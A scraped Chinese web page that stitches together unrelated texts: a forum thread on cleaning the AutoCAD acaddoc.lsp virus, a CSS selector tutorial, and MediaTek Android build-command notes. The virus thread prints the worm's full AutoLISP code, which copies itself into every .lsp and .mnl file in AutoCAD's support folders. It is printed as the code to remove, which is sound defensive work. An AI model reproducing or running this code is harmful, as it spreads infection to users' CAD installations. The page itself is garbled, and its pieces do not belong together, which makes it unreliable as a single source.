运行CAD之后会自动生成一个lisp文件

运行CAD之后会自动生成一个lisp文件,第1张

保证你不在局域网 或者u盘不乱拷吧。我也中了 这个,清楚不彻底。一下是我自己收集的。

方法 一

acaddoc.lsp输入的列表有缺陷(转自LOVE空间)2009年04月07日 星期二 上午 11:14这个是个新病毒,用以往的解决方法(1.lps改名为acaddoc.lsp替换)无法解决,在网络搜索了一下看到百度空间有个帖子有相关解决办法。

原帖如下:

今天在Q群里又见网友请求删除CAD病毒,说用专杀工具也无法解决,于是让他把病毒文件传了给我。

打开文件一看,发现这个“acaddoc.lsp”文件内的程序代码跟以往的“acaddoc.lsp”病毒文件不同。

该病毒文件自动搜索CAD支持路径下的所有“*.mnl”文件和“*.lsp”文件。将病毒代码(“acaddoc.lsp”文件内容)写入“*.lsp”文件内,并在“*.mnl”文件中写入“*.lsp”文件的加载路径。同时,直线命令“line”、外部参照管理命令“xref”和分解(炸开)命令“explode”无法使用。

CAD系统感染该病毒文件后,只是简单搜索删除“acaddoc.lsp”文件,不能清除病毒。因为所有的“*.lsp”文件已经被修改,所有“*.lsp”文件都是病毒文件。

解决方法壹:

①、关闭CAD

②、搜索并删除所有“acaddoc.lsp”文件

③、卸载CAD(必须卸载干净,并进入C盘用户目录内删除没有卸载完的CAD文件)后,重新安装CAD

解决方法贰:

①、关闭CAD

②、搜索并删除所有“acaddoc.lsp”文件

③、找一台没有被CAD病毒破坏、且安装有相同版本CAD的电脑,复制其所有“*.lsp”文件和“*.mnl”文件至本机覆盖原文件(包括C盘用户目录内的相关文件)

预防CAD病毒:

装好CAD系统后,在没有被病毒感染前,将CAD目录内所有文件的属性设置为只读,可以减少中毒的机率。(此法99.999%有效)

附:C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\

其中×××是你登录系统时的用户名, 200×和R×.×分别是CAD的版本和版本代号。(注意:目录C:\Documents and Settings\是系统隐藏文件夹)

转帖地址:http://hi.baidu.com/liuhuibin1984/blog/item/fbe647233340a543ad34deb3.html

方法 二

CAD开机运行时会有一大串函数,并且产生acaddoc.lsp的文件处理方法,我用了,方法很好就转过来了

以下是本人中了acaddoc.lsp病毒的后亲身体验的杀毒经历。

开始也在网上找了很多所谓的CAD病毒专杀、acaddoc.lsp专杀什么的软件。。。全试了都没有用。后来通过网上介绍的一些关于lsp病毒的特性,亲身试验后确实有效,在此和大家分享,希望能为大家解决一些问题。

下面言归正传,杀毒步骤如下:

1、全盘删除acaddoc.lsp(包括隐藏文件夹)——————废话了,呵呵

2、删除C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acaddoc.lsp和acadapq.lsp

3、删除C:\Documents and Settings\Administrator\Application。Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acad.mnl、acetmain.mnl和AecArchXOE.mnl。

4、删除C:\Program Files\AutoCAD 2006\Support下面所有的*****.lsp,本人用的2006版共10个****.lsp文件。

5、COPY下面附件的alsp内的两个文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support,改为只读。

6、COPY下面附件的mnl内的三个文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support,改为只读。

7、COPY下面附件的LSP内的十个文件到C:\Program Files\AutoCAD 2006\Support,改为只读。

经以上步骤处理后,就完全可以放心使用了。

方法 三

CAD的病毒很多但都大同小异。现就出现的ACADDOC.LSP病毒进行杀毒。不用重新安装CAD的办法。

1、发现文件夹中多出ACADDOC.LSP说明你中毒了。

2、关闭CAD程序。

3、全盘查找 *.fas *.lsp *.mnl *.arx文件,除了CAD安装目录以外的全部删除。

4、检查CAD安装目录文件的修改时间,把最近的几个文件中的病毒代码删除。(用记事本打开)

5、把CAD安装目录中的所有*.fas *.lsp *.mnl *.arx文件改为只读属性。

说明:

1、ACADDOC.LSP病毒感染X:\Program Files\AutoCAD 20**\Support文件夹下的3d.lsp;3darray.lsp;acad2010.lsp;acad2010doc.lsp;acadinfo.lsp;ai_utils.lsp;attredef.lsp;edge.lsp;mvsetup.lsp;sample-profile-util.lsp文件。

2、要删除的病毒代码在文件的尾部,具体如下:

(setq flagx t)

(setq bz "(setq flagx t)")

(defun app(source target bz / flag flag1 wjm wjm1 text)

(setq flag nil)

(setq flag1 t)

(if (findfile target)

(progn

(setq wjm1 (open target "r"))

(while (setq text (read-line wjm1))

(if (= text bz) (setq flag1 nil))

)while

(close wjm1)

)progn

)if

(if flag1

(progn

(setq wjm (open source "r"))

(setq wjm1 (open target "a"))

(write-line (chr 13) wjm1)

(while (setq text (read-line wjm))

(if (= text bz) (setq flag t))

(if flag

(progn

(write-line text wjm1)

)progn

)if

)while

(close wjm1)

(close wjm)

)progn

)if

)defun

(setvar "cmdecho" 0)

(setq acadmnl (findfile "acad.mnl"))

(setq acadmnlpath (vl-filename-directory acadmnl))

(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))

(setq mnlnum (length mnlfilelist))

(setq acadexe (findfile "acad.exe"))

(setq acadpath (vl-filename-directory acadexe))

(setq support (strcat acadpath "\\support"))

(setq lspfilelist (vl-directory-files support "*.lsp"))

(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))

(setq lspnum (length lspfilelist))

(setq dwgname (getvar "dwgname"))

(setq dwgpath (findfile dwgname))

(if dwgpath

(progn

(setq acaddocpath (vl-filename-directory dwgpath))

(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))

(setq mnln 0)

(while (<mnln mnlnum)

(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))

(app mnlfilename acaddocfile bz)

(app acaddocfile mnlfilename bz)

(setq mnln (1+ mnln))

)while

(setq lspn 0)

(while (<lspn lspnum)

(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))

(app lspfilename acaddocfile bz)

(app acaddocfile lspfilename bz)

(setq lspn (1+ lspn))

)while

)progn

)if

(setq mnln 0)

(while (<mnln mnlnum)

(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))

(setq mnln1 0)

(while (<mnln1 mnlnum)

(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))

(app mnlfilename mnlfilename1 bz)

(setq mnln1 (1+ mnln1))

)while

(setq lspn1 0)

(while (<lspn1 lspnum)

(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))

(app mnlfilename lspfilename1 bz)

(setq lspn1 (1+ lspn1))

)while

(setq mnln (1+ mnln))

)while

(setq lspn 0)

(while (<lspn lspnum)

(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))

(setq lspn1 0)

(while (<lspn1 lspnum)

(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))

(app lspfilename lspfilename1 bz)

(setq lspn1 (1+ lspn1))

)while

(setq mnln1 0)

(while (<mnln1 mnlnum)

(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))

(app lspfilename mnlfilename1 bz)

(setq mnln1 (1+ mnln1))

)while

(setq lspn (1+ lspn))

(load "acadapq")

(princ)

加入360督导委员会 参与全民护安全! 论坛版主扩编,欢迎您的加入!

canesky

金币:65

经验:99

等级:学前班

功勋:无

短信

[回复此楼][引用][举报] 2 楼 2010-06-11 09:27 顶!

寒梅雪松

金币:15

经验:51

等级:幼儿园

功勋:无

短信

[回复此楼][引用][举报] 3 楼 2010-11-10 03:14 这个方法不管用

aimou108

金币:15

经验:55

等级:幼儿园

功勋:无

短信

[回复此楼][引用][举报] 4 楼 2010-12-07 10:59 已解决!感谢360论坛!同时感谢qq!如果不是qq当年作出一个艰难的决定,我不会用上360.,也就不会知道360论坛。

楼主给我们提供了一个解决方案,但需要注意的是,病毒感染的并不仅仅是安装目录下的文件。如果仅仅清除安装目录下感染文件的代码,是无效的。这也是很多朋友说这个方法不管用的原因。它同时感染了

C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下的*.MNL文件。需要一并将上述代码清除。

这个问题折腾了我几个月,奶奶的。无毒一身轻啊。。。

CSS是由选择器加声明组成的。

比如:

h1{color:red}

h1就是选择器,意思是只要遇到h1,就使用该CSS的规则

color:red:这个事声明

color:这个是属性

red:这个是值

2

OK,我们先来分析选择器。

END

一.选择器

1

选择器的种类很多,各有各的作用。我们来一一讲解。

标签选择器

class选择器

id选择器

全局选择器

组合选择器

伪类选择器

2

标签选择器

顾名思义,HTML中有许多标签,而标签选择器就是用来给标签直接申明样式的,简单、实用、常用。

举例:

p{color:red}

只要是p标签,其P标签内部的颜色,都是红色。

如图代码

<head><meta http-equiv="Content-Type" content="text/htmlcharset=utf-8" /><title>无标题文档</title><style>p{ color:red}</style></head><body><p>嘿嘿哦嘿嘿呀哦嘿嘿哦</p></body>

其中,<style>标签是样式标签,请将CSS放在其中

(这部分内容后续会介绍,这里只是先提一下)

3

看网页效果

4

class选择器

也叫做类选择器,直接说概念估计你也不明白,直接上例子吧。

举例:

.alsp{color:red}

这就是一个class选择器,意思是有一种CSS的样式,其名字是alsp,谁想用谁用。

看代码:

<head><meta http-equiv="Content-Type" content="text/htmlcharset=utf-8" /><title>无标题文档</title><style type="text/css">.alsp{color:red}</style></head><body><p class="alsp">嘿嘿哦嘿嘿呀哦嘿嘿哦</p><ol class="alsp"><li>嘿啥嘿</li><li>我想嘿嘿</li><li>专制各种不服</li></ol><p>世界为亡,死不投降</p></body>

5

看网页效果

通过.alsp定义一个class选择器。

在后面的代码中,哪个标签想用,就用class="alsp"去调用,就可以使用这件“衣服”来修饰自己了

6

ID选择器

ID和class很像,但是和class有一个区别。class像姓名,两个人是可以同名的,但是id像身份z,只有一个人可以使用。

例如:

#alsp{color:red}

OK,上代码:

#alsp{color:red}</style></head><body><p id="alsp">嘿嘿哦嘿嘿呀哦嘿嘿哦</p><ol><li>嘿啥嘿</li><li>我想嘿嘿</li><li>专制各种不服</li></ol><p>世界为亡,死不投降</p></body>

7

看网页效果

只能有一个标签使用该id,或者说该标签专属ID

8

全局选择器

*{margin:0padding:0}

这个很简单,前面用个*来表示,整个网页都会使用。这句话也是网页基本都要添加的,什么意思呢?自己试试看吧。

9

组合选择器

组合选择,小编是非常喜欢使用的,原因无他,懒而已。他可以减少代码量,并且方便、易读。

不过组合选择器的组合方式比较多,但也多很好理解。

1)群模式

比如:

h1{color:redfont-size:14px}

p{color:redfont-size:14px}

a{color:redfont-size:14px}

这三个虽然标签不同,但是样式是一模一样的,所以,可以这样写:

h1,p,a,{color:redfont-size:14px}

2)继承模式

比如:

.alsp li{color:red}

<ul class=".alsp">

<li>fdf</li>

</ul>

li是在ul之中的,算是ul的后代。通过.alsp li确定li是属于调用alsp类选择器里的li标签,其他的li标签并不会使用该样式。

3)群模式(多元素并列选择器)

其实也是一种特殊的群模式

p.alsp{color:red}

<p class="alsp">p.alsp</p>

<a class="alsp">a.alsp</p>

alsp仍然是一种class选择器,但是他只有在p的标签下被使用才生效。

所以,第一行生效,p.alsp字样变红,第二行不生效

10

伪类选择器

“伪”字暴露了他的本质,伪类选择器并不像其他选择器直接做用在标签上,但是他偏偏又是在标签上进行使用,所以称为“伪类选择器”。

伪类的作用,是作用在状态上。

一般情况正常运行,只有当达成条件的时候触发,才会执行伪类选择器所代表是css样式。

伪类选择器很多,但许多都是我们这辈子估计都用不到的。

OK,伪类选择器后续我会专门写一篇经验介绍,有点小多,这里也就不多说了。

END

二.在HTML中调用CSS

调用CSS的常用方法有3中

内样式

外样式

行间样式

内样式

直接看代码,如图所示

在<head></head>中,加入<style></style>,并将相关的CSS样式放在其中

外样式

直接看代码,如图所示:

<link rel="stylesheet" type="text/css" href="index.css">

这里,href为css的路径。

意思是,你专门创建一个index.css的文件,里面放上CSS样式,和内样式的语法一模一样,只是专门找了一个文件存放而已。

行间样式

行间样式直接写在元素里面

例如:<p style="color:#900">嘿嘿哦嘿嘿呀哦嘿嘿哦</p>

直接在标签后面加上style

一般不要用,不过可以用来调试使用

END

总结

到这里,这篇经验就算完结了。你也应该知道如何去写CSS样式,如何在HTML里添加CSS样式了。

后面我会继续写CSS的声明部分。

1: ./mk n(r) kernel./mk bootimage当修改build-in 到kernel相关代码时,要使用此命令,具体文件参考如下:

alps/kernel/

alps/mediatek/platform/mt65xx/kernel/

alps/mediatek/source/kernel/

alps/mediatek/coustom/mt65xx/kernel/

alps/mediatek/coustom/common/kernel/

alps/mediatek/coustom/$porject_name$/kernel

...

ps: 由于./mk bootimag是很长的过程, 如果您没有修改到ramdisk相关的code, 可以参考以下FAQ加快编译.

只修改kernel的时候, 快速编译方法: FAQ05444

2: ./mk n(r) k /module_path 当修改kernel module相关代码时,要使用此命令,具体文件参考如下:

alps/mediatek/platform/mt65xx/kernel/drivers/ccci/

alsp/mediatek/platform/mt65xx/gpu/

......

通常看对应文件夹的Makefile就知道是build in到kernel,还是ko,

obj-m += xxx, 表示build成ko module,

obj-y += xxx, 表示build in到bootimag.

ps: 要特别注意, 如果你new的时候是user版本, 在使用此命令的时候一定要加上

-oTARGET_BUILD_VARIANT=user, 否则会导致将之前new的结果全部删除,

3: ./mk n pl 当修改preloader相关代码时,要使用此命令,具体如下:

alps/mediatek/platform/mt65xx/preloader/

alps/mediatek/source/preloader/

alps/mediatek/coustom/mt65xx/preloader/

alps/mediatek/coustom/common/preloader/

alps/mediatek/coustom/$porject_name$/kernle

......

4: ./mk uboot 当修改uboot相关代码时,要使用此命令,具体如下:

alps/mediatek/platform/mt65xx/uboot/

alps/mediatek/source/uboot/

alps/bootable/bootloader/uboot/

alps/mediatek/coustom/mt65xx/uboot/

alps/mediatek/coustom/common/buoot/

alps/mediatek/coustom/$porject_name$/uboot/

......

5: ./mk systemimage 当修改system相关代码时使用此命令,具体文件目录如下:

alps/frameworks/

alps/packages/

alps/vendor/

alps/hardware/

alps/dalvik/

alsp/external

...........

new完一次后, 如果使用这个命令其实很耗时间, 建议参考6的做法,

6: ./mk mm ./module_path 主要build一些modules, 如lib库, native 可执行程序, jar库, jar

apk. 相关文件参考如下:

alps/frameworks/base #可以根据修改的某些文件, 进入更细的目录去build相关库.

alps/frameworks/native/libs/binder/ #native目录下有很多相关的lib库.

alps/frameworks/native/libs/binder/utils/

alps/external#主要是一些native的二进制可执行文件.

ps: build完后可以找到对应的目标文件直接push到手机, 也可以使用./mk snod直接快速打包新的system.img, 然后download. 可参考如下FAQ:

如何加速./mk snod打包: FAQ10299

7: ./mk recoverimage 当修改recover相关代码时使用此命令,具体如下:

alps/bootable/recovery/

alps/mediatek/customer/$project_name$/recovery/

......

8: ./mk factoryimage: 当修改factory相关代码时使用此命令,具体如下:

alps/mediatek/coustom/$project_name$/factory/

alps/mediatek/coustom/common/factory/

alps/mediatek/source/factory/

......

9: ./mk secroimage 当修改secro相关代码时使用此命令,具体如下:

alps/mediatek/source/secro/

alps/mediatek/coustom/$project_name$/secro/


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/tougao/12039663.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-20
下一篇 2023-05-20

发表评论

登录后才能评论

评论列表(0条)

保存